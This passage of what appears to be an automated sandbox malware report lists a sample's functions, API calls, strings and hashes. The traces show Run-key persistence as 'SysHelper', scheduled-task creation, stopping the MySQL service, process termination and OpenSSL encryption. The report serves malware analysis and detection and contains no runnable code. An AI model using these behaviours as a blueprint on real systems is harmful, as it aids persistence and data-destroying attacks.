                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        • Opcode ID: b25546bc12d8c16b08739c854dae2cee3f6687a3fdd1d63860831ebc4cd35d94
                                                                                                                                                                        • Instruction ID: 6b9a449f06320c2f11ebfa08065eb62468f0556c3eac3146a72a362c28d381a1
                                                                                                                                                                        • Opcode Fuzzy Hash: b25546bc12d8c16b08739c854dae2cee3f6687a3fdd1d63860831ebc4cd35d94
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF1A5716483416BE723EA64DC82F9BB7D89F55704F040829F989DF283E774EA098793
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        • Opcode ID: a679a8657c5c68cb212a824ff10633027cc4a3dd8d6d965d4dcc1fd8b6e17e36
                                                                                                                                                                        • Instruction ID: 054bf4a7a3574298742084a6b960152fceb3c5eb15db6fe2d456518068e8d15e
                                                                                                                                                                        • Opcode Fuzzy Hash: a679a8657c5c68cb212a824ff10633027cc4a3dd8d6d965d4dcc1fd8b6e17e36
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A21D13660BA01ABEB277F64DC26F0FBBE8DF41720F214429F484594E2EA219910CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00307B29
                                                                                                                                                                        • _free.LIBCMT ref: 00307B42
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • _free.LIBCMT ref: 00307B55
                                                                                                                                                                        • _free.LIBCMT ref: 00307B73
                                                                                                                                                                        • _free.LIBCMT ref: 00307B85
                                                                                                                                                                        • _free.LIBCMT ref: 00307B96
                                                                                                                                                                        • _free.LIBCMT ref: 00307BA1
                                                                                                                                                                        • _free.LIBCMT ref: 00307BC5
                                                                                                                                                                        • EncodePointer.KERNEL32(009E2168), ref: 00307BCC
                                                                                                                                                                        • _free.LIBCMT ref: 00307BE1
                                                                                                                                                                        • _free.LIBCMT ref: 00307BF7
                                                                                                                                                                        • _free.LIBCMT ref: 00307C1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                                                        • Opcode ID: e0e30a74c9cb290a159cce6fb19fece1b8442ecb5b3bfd08b96b804bcf86de25
                                                                                                                                                                        • Instruction ID: c585b41f8a144414bf1a88815c69c949273220bd1e63c4305a6876b79db3ae11
                                                                                                                                                                        • Opcode Fuzzy Hash: e0e30a74c9cb290a159cce6fb19fece1b8442ecb5b3bfd08b96b804bcf86de25
                                                                                                                                                                        • Instruction Fuzzy Hash: DE216276D0A5918BCB2B9F9AFC90F297768E704724F15053AE9045B2E1CB74BC81CE90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002F1BB0
                                                                                                                                                                        • CoCreateInstance.OLE32(003AE908,00000000,00000001,003AD568,00000000), ref: 002F1BC8
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002F1BD0
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 002F1C12
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 002F1C22
                                                                                                                                                                        • lstrcatW.KERNEL32(?,003E0050), ref: 002F1C3A
                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 002F1C44
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 002F1C68
                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 002F1C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00334B72), ref: 003349C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 003349D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 003349FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00334B72), ref: 00334A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00334B72), ref: 00334A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00334B72), ref: 00334A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00334B72), ref: 00334A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00334A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00334C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0033480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00331D37,00000000,002ECDAE,00000001,00000001), ref: 00334AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00334B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00334B27
                                                                                                                                                                          • Part of subcall function 0030BDCC: _vfprintf_helper.LIBCMT ref: 0030BDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00334B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00334B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00334BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00334BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00334BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 002F2389
                                                                                                                                                                        • _memset.LIBCMT ref: 002F23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 002F23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002F23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 002F23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002F240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 002F2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 002F237F
                                                                                                                                                                        • SysHelper, xrefs: 002F23D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F27F
                                                                                                                                                                          • Part of subcall function 00310CFC: std::exception::_Copy_str.LIBCMT ref: 00310D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F294
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 0032F2D4
                                                                                                                                                                          • Part of subcall function 0032EF74: std::exception::exception.LIBCMT ref: 0032EF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call$le;
                                                                                                                                                                        • API String ID: 2464034642-2873060509
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002EDAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(003B4F6C,00000000,00000001,003B4F3C,?,?,003AA948,000000FF), ref: 002EDB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002EDBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,003AA948,000000FF), ref: 002EDBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 002EDC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002EDC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 002F1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 002F1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 002F1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 002F1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002F1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 002F1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 002F1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 002F1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 003035B1
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0030364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00303680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0030369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 003036F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00303726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00303744
                                                                                                                                                                        • __allrem.LIBCMT ref: 0030375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00303779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 003454C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 003454D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 003454F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00345503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00345531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0034555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 003455F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 790675137-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 002F244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002F24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 002F24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 002F24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 002EF338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 002EF353
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___unDName.LIBCMT ref: 0031071B
                                                                                                                                                                        • _strlen.LIBCMT ref: 0031072E
                                                                                                                                                                        • __lock.LIBCMT ref: 0031074A
                                                                                                                                                                        • _malloc.LIBCMT ref: 0031075C
